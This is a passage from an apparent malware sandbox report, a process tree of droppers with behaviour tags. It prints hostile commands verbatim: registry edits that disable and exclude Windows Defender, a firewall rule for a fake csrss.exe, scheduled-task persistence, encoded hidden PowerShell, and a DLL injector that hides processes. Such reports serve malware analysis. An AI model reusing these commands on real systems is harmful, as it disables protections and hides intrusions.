- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 3565⤵
- Program crash
PID:4972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 3445⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 5685⤵
- Program crash
PID:60
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 6325⤵
- Program crash
PID:2692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 6685⤵
- Program crash
PID:208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 6805⤵
- Program crash
PID:4132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 6085⤵
- Program crash
PID:32
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7845⤵
- Program crash
PID:4768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 3725⤵
- Program crash
PID:1396
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2108
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:32
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 3886⤵
- Program crash
PID:800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 3686⤵
- Program crash
PID:3352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 4046⤵
- Program crash
PID:3116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 6206⤵
- Program crash
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 6646⤵
- Program crash
PID:4744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 7486⤵
- Program crash
PID:644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 7086⤵PID:3364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 7606⤵PID:2736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 8446⤵PID:2324
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2660
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2640
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 8566⤵PID:2644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 9126⤵PID:3132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 8326⤵PID:192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 8326⤵PID:1396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 7766⤵PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:3908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 9566⤵PID:2696
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3352
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:3168 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2900
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 10326⤵PID:1820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 10726⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 11286⤵PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 11686⤵PID:716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 10766⤵PID:1312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 12006⤵PID:1568
-
-
-
-
-
C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 3884⤵
- Program crash
PID:2120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 4284⤵
- Program crash
PID:660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 3884⤵
- Program crash
PID:4384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 6244⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7084⤵
- Program crash
PID:2248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 6124⤵
- Program crash
PID:4916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 6844⤵
- Program crash
PID:2116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 6564⤵
- Program crash
PID:5112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7884⤵
- Program crash
PID:4792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7924⤵
- Program crash
PID:2608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7884⤵
- Program crash
PID:672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 8204⤵
- Program crash
PID:4736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7724⤵
- Program crash
PID:2636 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵PID:4872
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7804⤵
- Program crash
PID:2548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7964⤵
- Program crash
PID:2136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 8004⤵
- Program crash
PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7724⤵
- Program crash
PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 7844⤵
- Program crash
PID:3168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 5924⤵
- Program crash
PID:2236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"C:\Users\Admin\Pictures\bdPw0hu74RQXo05YdiloFcXR.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 3565⤵
- Program crash
PID:3660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 3365⤵
- Program crash
PID:2780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 3725⤵
- Program crash
PID:4656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 6325⤵
- Program crash
PID:3688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 6685⤵
- Program crash
PID:5100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 7005⤵
- Program crash
PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 8365⤵
- Program crash
PID:1940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 5565⤵
- Program crash
PID:504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 5885⤵
- Program crash
PID:428
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 9685⤵
- Program crash
PID:2484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 6485⤵
- Program crash
PID:2536
-
-
-
-
C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe"C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exeC:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6e609558,0x6e609564,0x6e6095704⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iNiYbTHs1Lq4Du24QcHKlJFg.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316
-
-
C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe"C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3788 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204035522" --session-guid=607bffc0-3e6f-4278-8009-373c08a07445 --server-tracking-blob=YmM1N2E0MmQxYjJjYzYwMDc4ODg0M2QxZDFjNGU4YzljN2JlZDRjMGE5NmFkMDhiODI0ZTQzZDFmNDhiYjA5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzAxODkxOS4xOTU2IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyZTg1NGVhNi03N2U2LTQ3OGQtYTNlNS0yMTQ2ZGU4ZDgyMDIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=60040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exeC:\Users\Admin\Pictures\iNiYbTHs1Lq4Du24QcHKlJFg.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d619558,0x6d619564,0x6d6195705⤵
- Executes dropped EXE
- Loads dropped DLL
PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xdc2614,0xdc2620,0xdc262c5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4552
-
-
-
-
C:\Users\Admin\Pictures\ftIGodt38l1A0el3gsSuEKzA.exe"C:\Users\Admin\Pictures\ftIGodt38l1A0el3gsSuEKzA.exe"3⤵
- Executes dropped EXE
PID:212
-
-
C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe"C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3828
-
-
C:\Users\Admin\Pictures\7nbYV20XbAUjbnnHzTZl4oOU.exe"C:\Users\Admin\Pictures\7nbYV20XbAUjbnnHzTZl4oOU.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\7zSC237.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\7zSC505.tmp\Install.exe.\Install.exe /mGaXdidI "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2636
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2188
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4596
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:2536
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:4712
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3836
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gljlSwDtk" /SC once /ST 02:37:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gljlSwDtk"6⤵PID:4916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gljlSwDtk"6⤵PID:352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exe\" cj /Alsite_idxfn 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:4972
-
-
-
-
-
C:\Users\Admin\Pictures\UYUnAyqE2cpLDpQgWoHzWPCg.exe"C:\Users\Admin\Pictures\UYUnAyqE2cpLDpQgWoHzWPCg.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-36KFH.tmp\ModJdN8jNVnymd9XGEFiFx7U.tmp"C:\Users\Admin\AppData\Local\Temp\is-36KFH.tmp\ModJdN8jNVnymd9XGEFiFx7U.tmp" /SL5="$70208,831488,831488,C:\Users\Admin\Pictures\ModJdN8jNVnymd9XGEFiFx7U.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:4380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:216
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:832
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2784
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4236
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:2812
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4840
-
C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exeC:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HbyLpiR.exe cj /Alsite_idxfn 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 